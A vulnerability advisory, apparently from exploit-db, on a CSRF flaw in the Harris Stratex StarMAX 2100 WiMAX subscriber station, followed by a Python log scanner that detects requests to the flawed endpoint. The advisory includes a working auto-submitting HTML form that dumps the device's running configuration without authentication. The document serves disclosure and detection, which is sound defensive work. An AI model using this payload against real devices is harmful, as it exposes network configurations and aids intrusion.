Harris Stratex StarMAX 2100 WIMAX Subscriber Station – Running Configuration Cross-Site Request Forgery

  • Author: kalyanakumar
    Date: 2010-07-07
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/14264/
  • I found a CSRF vulnerability in the Harris Stratex WIMAX 2100 subscriber
    station. Using this code I am able to view the current configuration of the
    subscriber station without authentication from both LAN & WAN.
    
    # Software Link: http://securityvulns.com/Wdocument736.html
    # Version: 3.0.4.1.7.C
    # Tested on: Any OS
    # CVE: No
    
    Product: StarMAX 2100 WIMAX subscriber station
    Affected Application Version: 3.0.4.1.7.C
    Vendor submission: 07-04-2009
    Vendor Response: No
    Vulnerability: Able to view the running configuration without authentication from both LAN & WAN
    
    <html>
    <!-- The form below is submitted as a GET request as soon as the page loads -->
    <body onload="config.submit();">
    <form name=config method="get" action="http://192.168.1.1/frameCmd6.html">
    <input type=hidden name=showRunConfig value="Current Configuration">
    </form>
    </body>
    </html>
    
    
    Thanks
    Kalyan
    Security researcher
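
An added detection example, not part of the original advisory: it scans proxy access logs for requests to the `frameCmd6.html` endpoint carrying the `showRunConfig` parameter from the proof of concept above, and labels each one by its Referer as cross-site, same-site or no-referer. The log format (combined, with an absolute URL in the request line), the sample lines, and every host or path other than `192.168.1.1/frameCmd6.html` are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint and parameter as they appear in the advisory's proof of concept.
CONFIG_PATH, CONFIG_PARAM = "/frameCmd6.html", "showRunConfig"

# Assumed input: combined log format with an absolute URL in the request line,
# as a forward proxy writes it. Adapt the regex to your own log source.
LINE_RE = re.compile(
    r'(?P<client>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "[^"]*"'
)

def classify(line):
    """Return a finding dict for a config-dump request, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["url"])
    if url.path != CONFIG_PATH or CONFIG_PARAM not in parse_qs(url.query, keep_blank_values=True):
        return None
    ref = m["referer"]
    ref_host = urlsplit(ref).hostname if ref not in ("", "-") else None
    if ref_host is None:
        origin = "no-referer"   # typed URL, script, or referrer stripped
    elif ref_host == url.hostname:
        origin = "same-site"    # reached from the device's own pages
    else:
        origin = "cross-site"   # a page on another host drove the browser here
    return {"client": m["client"], "device": url.hostname, "origin": origin,
            "referer_host": ref_host, "served": m["status"] == "200"}

def scan(lines):
    """Findings for every config-dump request in an iterable of log lines."""
    return [f for f in map(classify, lines) if f]

# Constructed sample lines (not real traffic); forum.example, menu.html,
# index.html and the client addresses are made up for illustration.
REQ = "GET http://192.168.1.1/frameCmd6.html?showRunConfig=Current+Configuration HTTP/1.1"
SAMPLE = [
    f'10.0.0.23 - - [07/Jul/2010:10:15:02 +0000] "{REQ}" 200 5120 "http://forum.example/thread/42" "Mozilla/5.0"',
    '10.0.0.23 - - [07/Jul/2010:10:15:09 +0000] "GET http://192.168.1.1/index.html HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    f'10.0.0.40 - - [07/Jul/2010:11:02:44 +0000] "{REQ}" 200 5120 "http://192.168.1.1/menu.html" "Mozilla/5.0"',
    f'10.0.0.51 - - [07/Jul/2010:11:30:10 +0000] "{REQ}" 401 0 "-" "curl/7.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A `cross-site` finding with `served` set to true is the case the advisory describes; `no-referer` hits still merit review because referrer policies and non-browser clients omit the header.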